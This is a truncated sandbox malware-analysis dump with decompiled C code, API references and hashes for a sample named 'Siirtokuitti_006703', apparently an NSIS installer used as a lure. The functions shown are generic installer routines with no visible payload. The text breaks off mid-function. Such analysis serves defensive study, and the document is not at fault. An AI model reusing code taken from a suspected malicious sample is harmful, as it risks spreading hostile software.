                                                                                                                      0x00000000

                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062AB,00422708,00000000,?,?,Call,?), ref: 00406241
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Open
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 71445658-0
                                                                                                                      • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                      • Instruction ID: 3024dc78f91217c8ac754af2bee00b96045fdb9f0f4599777b3fb0e88d8c22ab
                                                                                                                      • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                      • Instruction Fuzzy Hash: 8AD0123200020DBBDF116E919D05FAB371DEB04310F014426FE16A4091D775D530AB15
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00403441(long _a4) {
                                                                                                                      				long _t2;
                                                                                                                      
                                                                                                                      				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                                                                                      				return _t2;
                                                                                                                      			}




                                                                                                                      0x0040344f
                                                                                                                      0x00403455

                                                                                                                      APIs
                                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313F,?), ref: 0040344F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FilePointer
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 973152223-0
                                                                                                                      • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                      • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                                      • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                      • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0040437A(int _a4) {
                                                                                                                      				long _t2;
                                                                                                                      
                                                                                                                      				_t2 = SendMessageW( *0x42a248, 0x28, _a4, "true"); // executed
                                                                                                                      				return _t2;
                                                                                                                      			}




                                                                                                                      0x00404388
                                                                                                                      0x0040438e

                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000028,?,?,004041A5), ref: 00404388
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3850602802-0
                                                                                                                      • Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                                      • Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
                                                                                                                      • Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                                      • Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E1000121B() {
                                                                                                                      				void* _t3;
                                                                                                                      
                                                                                                                      				_t3 = GlobalAlloc(0x40,  *0x1000406c +  *0x1000406c); // executed
                                                                                                                      				return _t3;
                                                                                                                      			}




                                                                                                                      0x10001225
                                                                                                                      0x1000122b

                                                                                                                      APIs
                                                                                                                      • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19421717588.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19421678749.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19421756473.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19421792485.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocGlobal
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3761449716-0
                                                                                                                      • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                                      • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                                                                                      • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                                      • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E00405553(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                                                                      				struct HWND__* _v8;
                                                                                                                      				long _v12;
                                                                                                                      				struct tagRECT _v28;
                                                                                                                      				void* _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				int _v44;
                                                                                                                      				int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				int _v56;
                                                                                                                      				void* _v60;
                                                                                                                      				void* _v68;
                                                                                                                      				void* __ebx;
                                                                                                                      				void* __edi;
                                                                                                                      				void* __esi;
                                                                                                                      				struct HWND__* _t94;
                                                                                                                      				long _t95;
                                                                                                                      				int _t100;
                                                                                                                      				void* _t108;
                                                                                                                      				intOrPtr _t130;
                                                                                                                      				struct HWND__* _t134;
                                                                                                                      				int _t156;
                                                                                                                      				int _t159;
                                                                                                                      				struct HMENU__* _t164;
                                                                                                                      				struct HWND__* _t168;
                                                                                                                      				struct HWND__* _t169;
                                                                                                                      				int _t171;
                                                                                                                      				void* _t172;
                                                                                                                      				short* _t173;
                                                                                                                      				short* _t175;
                                                                                                                      				int _t177;
                                                                                                                      
                                                                                                                      				_t169 =  *0x429224;
                                                                                                                      				_t156 = 0;
                                                                                                                      				_v8 = _t169;
                                                                                                                      				if(_a8 != 0x110) {
                                                                                                                      					if(_a8 == 0x405) {
                                                                                                                      						CloseHandle(CreateThread(0, 0, E004054E7, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                                                                                                      					}
                                                                                                                      					if(_a8 != 0x111) {
                                                                                                                      						L17:
                                                                                                                      						_t171 = 1;
                                                                                                                      						if(_a8 != 0x404) {
                                                                                                                      							L25:
                                                                                                                      							if(_a8 != 0x7b) {
                                                                                                                      								goto L20;
                                                                                                                      							}
                                                                                                                      							_t94 = _v8;
                                                                                                                      							if(_a12 != _t94) {
                                                                                                                      								goto L20;
                                                                                                                      							}
                                                                                                                      							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                                                                                      							_a8 = _t95;
                                                                                                                      							if(_t95 <= _t156) {
                                                                                                                      								L36:
                                                                                                                      								return 0;
                                                                                                                      							}
                                                                                                                      							_t164 = CreatePopupMenu();
                                                                                                                      							AppendMenuW(_t164, _t156, _t171, E004063D2(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                                                                                      							_t100 = _a16;
                                                                                                                      							_t159 = _a16 >> 0x10;
                                                                                                                      							if(_a16 == 0xffffffff) {
                                                                                                                      								GetWindowRect(_v8,  &_v28);
                                                                                                                      								_t100 = _v28.left;
                                                                                                                      								_t159 = _v28.top;
                                                                                                                      							}
                                                                                                                      							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                                                                                                      								_v60 = _t156;
                                                                                                                      								_v48 = 0x423728;
                                                                                                                      								_v44 = 0x1000;
                                                                                                                      								_a4 = _a8;
                                                                                                                      								do {
                                                                                                                      									_a4 = _a4 - 1;
                                                                                                                      									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                                                                                                      								} while (_a4 != _t156);
                                                                                                                      								OpenClipboard(_t156);
                                                                                                                      								EmptyClipboard();
                                                                                                                      								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                                                                                      								_a4 = _t108;
                                                                                                                      								_t172 = GlobalLock(_t108);
                                                                                                                      								do {
                                                                                                                      									_v48 = _t172;
                                                                                                                      									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                                                                                      									 *_t173 = 0xd;
                                                                                                                      									_t175 = _t173 + 2;
                                                                                                                      									 *_t175 = 0xa;
                                                                                                                      									_t172 = _t175 + 2;
                                                                                                                      									_t156 = _t156 + 1;
                                                                                                                      								} while (_t156 < _a8);
                                                                                                                      								GlobalUnlock(_a4);
                                                                                                                      								SetClipboardData(0xd, _a4);
                                                                                                                      								CloseClipboard();
                                                                                                                      							}
                                                                                                                      							goto L36;
                                                                                                                      						}
                                                                                                                      						if( *0x42920c == _t156) {
                                                                                                                      							ShowWindow( *0x42a248, 8);
                                                                                                                      							if( *0x42a2ec == _t156) {
                                                                                                                      								E00405414( *((intOrPtr*)( *0x422700 + 0x34)), _t156);
                                                                                                                      							}
                                                                                                                      							E0040431E(_t171);
                                                                                                                      							goto L25;
                                                                                                                      						}
                                                                                                                      						 *0x421ef8 = 2;
                                                                                                                      						E0040431E(0x78);
                                                                                                                      						goto L20;
                                                                                                                      					} else {
                                                                                                                      						if(_a12 != 0x403) {
                                                                                                                      							L20:
                                                                                                                      							return E004043AC(_a8, _a12, _a16);
                                                                                                                      						}
                                                                                                                      						ShowWindow( *0x429210, _t156);
                                                                                                                      						ShowWindow(_t169, 8);
                                                                                                                      						E0040437A(_t169);
                                                                                                                      						goto L17;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      				_v52 = _v52 | 0xffffffff;
                                                                                                                      				_v40 = _v40 | 0xffffffff;
                                                                                                                      				_t177 = 2;
                                                                                                                      				_v60 = _t177;
                                                                                                                      				_v56 = 0;
                                                                                                                      				_v48 = 0;
                                                                                                                      				_v44 = 0;
                                                                                                                      				asm("stosd");
                                                                                                                      				asm("stosd");
                                                                                                                      				_t130 =  *0x42a254;
                                                                                                                      				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                                                                                      				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                                                                                      				 *0x429210 = GetDlgItem(_a4, 0x403);
                                                                                                                      				 *0x429208 = GetDlgItem(_a4, 0x3ee);
                                                                                                                      				_t134 = GetDlgItem(_a4, 0x3f8);
                                                                                                                      				 *0x429224 = _t134;
                                                                                                                      				_v8 = _t134;
                                                                                                                      				E0040437A( *0x429210);
                                                                                                                      				 *0x429214 = E00404CB1(4);
                                                                                                                      				 *0x42922c = 0;
                                                                                                                      				GetClientRect(_v8,  &_v28);
                                                                                                                      				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                                                                                      				SendMessageW(_v8, 0x1061, 0,  &_v60);
                                                                                                                      				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
                                                                                                                      				if(_a8 >= 0) {
                                                                                                                      					SendMessageW(_v8, 0x1001, 0, _a8);
                                                                                                                      					SendMessageW(_v8, 0x1026, 0, _a8);
                                                                                                                      				}
                                                                                                                      				if(_a12 >= _t156) {
                                                                                                                      					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                                                                                      				}
                                                                                                                      				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                                      				_push(0x1b);
                                                                                                                      				E00404345(_a4);
                                                                                                                      				if(( *0x42a25c & 0x00000003) != 0) {
                                                                                                                      					ShowWindow( *0x429210, _t156);
                                                                                                                      					if(( *0x42a25c & 0x00000002) != 0) {
                                                                                                                      						 *0x429210 = _t156;
                                                                                                                      					} else {
                                                                                                                      						ShowWindow(_v8, 8);
                                                                                                                      					}
                                                                                                                      					E0040437A( *0x429208);
                                                                                                                      				}
                                                                                                                      				_t168 = GetDlgItem(_a4, 0x3ec);
                                                                                                                      				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                                                                                      				if(( *0x42a25c & 0x00000004) != 0) {
                                                                                                                      					SendMessageW(_t168, 0x409, _t156, _a12);
                                                                                                                      					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                                                                                      				}
                                                                                                                      				goto L36;
                                                                                                                      			}

































                                                                                                                      0x0040555b
                                                                                                                      0x00405561
                                                                                                                      0x0040556b
                                                                                                                      0x0040556e
                                                                                                                      0x00405704
                                                                                                                      0x00405728
                                                                                                                      0x00405728
                                                                                                                      0x0040573b
                                                                                                                      0x00405759
                                                                                                                      0x0040575b
                                                                                                                      0x00405763
                                                                                                                      0x004057b9
                                                                                                                      0x004057bd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004057bf
                                                                                                                      0x004057c5
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004057cf
                                                                                                                      0x004057d7
                                                                                                                      0x004057da
                                                                                                                      0x004058dc
                                                                                                                      0x00000000
                                                                                                                      0x004058dc
                                                                                                                      0x004057e9
                                                                                                                      0x004057f4
                                                                                                                      0x004057fd
                                                                                                                      0x00405808
                                                                                                                      0x0040580b
                                                                                                                      0x00405814
                                                                                                                      0x0040581a
                                                                                                                      0x0040581d
                                                                                                                      0x0040581d
                                                                                                                      0x00405835
                                                                                                                      0x0040583e
                                                                                                                      0x00405841
                                                                                                                      0x00405848
                                                                                                                      0x0040584f
                                                                                                                      0x00405857
                                                                                                                      0x00405857
                                                                                                                      0x0040586e
                                                                                                                      0x0040586e
                                                                                                                      0x00405875
                                                                                                                      0x0040587b
                                                                                                                      0x00405887
                                                                                                                      0x0040588e
                                                                                                                      0x00405897
                                                                                                                      0x00405899
                                                                                                                      0x0040589c
                                                                                                                      0x004058ab
                                                                                                                      0x004058ae
                                                                                                                      0x004058b4
                                                                                                                      0x004058b5
                                                                                                                      0x004058bb
                                                                                                                      0x004058bc
                                                                                                                      0x004058bd
                                                                                                                      0x004058c5
                                                                                                                      0x004058d0
                                                                                                                      0x004058d6
                                                                                                                      0x004058d6
                                                                                                                      0x00000000
                                                                                                                      0x00405835
                                                                                                                      0x0040576b
                                                                                                                      0x0040579b
                                                                                                                      0x004057a3
                                                                                                                      0x004057ae
                                                                                                                      0x004057ae
                                                                                                                      0x004057b4
                                                                                                                      0x00000000
                                                                                                                      0x004057b4
                                                                                                                      0x0040576f
                                                                                                                      0x00405779
                                                                                                                      0x00000000
                                                                                                                      0x0040573d
                                                                                                                      0x00405743
                                                                                                                      0x0040577e
                                                                                                                      0x00000000
                                                                                                                      0x00405787
                                                                                                                      0x0040574c
                                                                                                                      0x00405751
                                                                                                                      0x00405754
                                                                                                                      0x00000000
                                                                                                                      0x00405754
                                                                                                                      0x0040573b
                                                                                                                      0x00405574
                                                                                                                      0x00405578
                                                                                                                      0x00405580
                                                                                                                      0x00405584
                                                                                                                      0x00405587
                                                                                                                      0x0040558a
                                                                                                                      0x0040558d
                                                                                                                      0x00405590
                                                                                                                      0x00405591
                                                                                                                      0x00405592
                                                                                                                      0x004055ab
                                                                                                                      0x004055ae
                                                                                                                      0x004055b8
                                                                                                                      0x004055c7
                                                                                                                      0x004055cf
                                                                                                                      0x004055d7
                                                                                                                      0x004055dc
                                                                                                                      0x004055df
                                                                                                                      0x004055eb
                                                                                                                      0x004055f4
                                                                                                                      0x004055fd
                                                                                                                      0x0040561f
                                                                                                                      0x00405625
                                                                                                                      0x00405636
                                                                                                                      0x0040563b
                                                                                                                      0x00405649
                                                                                                                      0x00405657
                                                                                                                      0x00405657
                                                                                                                      0x0040565c
                                                                                                                      0x0040566a
                                                                                                                      0x0040566a
                                                                                                                      0x0040566f
                                                                                                                      0x00405672
                                                                                                                      0x00405677
                                                                                                                      0x00405683
                                                                                                                      0x0040568c
                                                                                                                      0x00405699
                                                                                                                      0x004056a8
                                                                                                                      0x0040569b
                                                                                                                      0x004056a0
                                                                                                                      0x004056a0
                                                                                                                      0x004056b4
                                                                                                                      0x004056b4
                                                                                                                      0x004056c8
                                                                                                                      0x004056d1
                                                                                                                      0x004056da
                                                                                                                      0x004056ea
                                                                                                                      0x004056f6
                                                                                                                      0x004056f6
                                                                                                                      0x00000000

                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 004055B1
                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004055C0
                                                                                                                      • GetClientRect.USER32(?,?), ref: 004055FD
                                                                                                                      • GetSystemMetrics.USER32(00000002), ref: 00405604
                                                                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405625
                                                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405636
                                                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405649
                                                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405657
                                                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040566A
                                                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040568C
                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 004056A0
                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004056C1
                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004056D1
                                                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004056EA
                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004056F6
                                                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 004055CF
                                                                                                                        • Part of subcall function 0040437A: SendMessageW.USER32(00000028,?,?,004041A5), ref: 00404388
                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405713
                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000054E7,00000000), ref: 00405721
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405728
                                                                                                                      • ShowWindow.USER32(00000000), ref: 0040574C
                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405751
                                                                                                                      • ShowWindow.USER32(00000008), ref: 0040579B
                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057CF
                                                                                                                      • CreatePopupMenu.USER32 ref: 004057E0
                                                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004057F4
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00405814
                                                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040582D
                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405865
                                                                                                                      • OpenClipboard.USER32(00000000), ref: 00405875
                                                                                                                      • EmptyClipboard.USER32 ref: 0040587B
                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405887
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405891
                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A5
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004058C5
                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004058D0
                                                                                                                      • CloseClipboard.USER32 ref: 004058D6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                      • String ID: (7B${
                                                                                                                      • API String ID: 590372296-525222780
                                                                                                                      • Opcode ID: f086514403ad079958e05c79f9398a2ee239ec86c73215fd307c521ee98444fa
                                                                                                                      • Instruction ID: f8c5fe522ebc9739dae7df13929d3a15495bf3740f19f89270c8c50aa4207807
                                                                                                                      • Opcode Fuzzy Hash: f086514403ad079958e05c79f9398a2ee239ec86c73215fd307c521ee98444fa
                                                                                                                      • Instruction Fuzzy Hash: AFB15870900608FFDB11AFA0DD85AAE7B79FB44354F00847AFA45B61A0CB754E51DF68
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 78%
                                                                                                                      			E00404814(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				long _v16;
                                                                                                                      				long _v20;
                                                                                                                      				long _v24;
                                                                                                                      				char _v28;
                                                                                                                      				intOrPtr _v32;
                                                                                                                      				long _v36;
                                                                                                                      				char _v40;
                                                                                                                      				unsigned int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				WCHAR* _v56;
                                                                                                                      				intOrPtr _v60;
                                                                                                                      				intOrPtr _v64;
                                                                                                                      				intOrPtr _v68;
                                                                                                                      				WCHAR* _v72;
                                                                                                                      				void _v76;
                                                                                                                      				struct HWND__* _v80;
                                                                                                                      				void* __ebx;
                                                                                                                      				void* __edi;
                                                                                                                      				void* __esi;
                                                                                                                      				intOrPtr _t82;
                                                                                                                      				long _t87;
                                                                                                                      				short* _t89;
                                                                                                                      				void* _t95;
                                                                                                                      				signed int _t96;
                                                                                                                      				int _t109;
                                                                                                                      				signed short _t114;
                                                                                                                      				signed int _t118;
                                                                                                                      				struct HWND__** _t122;
                                                                                                                      				intOrPtr* _t138;
                                                                                                                      				WCHAR* _t146;
                                                                                                                      				unsigned int _t150;
                                                                                                                      				signed int _t152;
                                                                                                                      				unsigned int _t156;
                                                                                                                      				signed int _t158;
                                                                                                                      				signed int* _t159;
                                                                                                                      				signed int* _t160;
                                                                                                                      				struct HWND__* _t166;
                                                                                                                      				struct HWND__* _t167;
                                                                                                                      				int _t169;
                                                                                                                      				unsigned int _t197;
                                                                                                                      
                                                                                                                      				_t156 = __edx;
                                                                                                                      				_t82 =  *0x422700;
                                                                                                                      				_v32 = _t82;
                                                                                                                      				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
                                                                                                                      				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                                                                                      				if(_a8 == 0x40b) {
                                                                                                                      					E004059F6(0x3fb, _t146);
                                                                                                                      					E00406644(_t146);
                                                                                                                      				}
                                                                                                                      				_t167 = _a4;
                                                                                                                      				if(_a8 != 0x110) {
                                                                                                                      					L8:
                                                                                                                      					if(_a8 != 0x111) {
                                                                                                                      						L20:
                                                                                                                      						if(_a8 == 0x40f) {
                                                                                                                      							L22:
                                                                                                                      							_v8 = _v8 & 0x00000000;
                                                                                                                      							_v12 = _v12 & 0x00000000;
                                                                                                                      							E004059F6(0x3fb, _t146);
                                                                                                                      							if(E00405D89(_t186, _t146) == 0) {
                                                                                                                      								_v8 = 1;
                                                                                                                      							}
                                                                                                                      							E004063B0(0x4216f8, _t146);
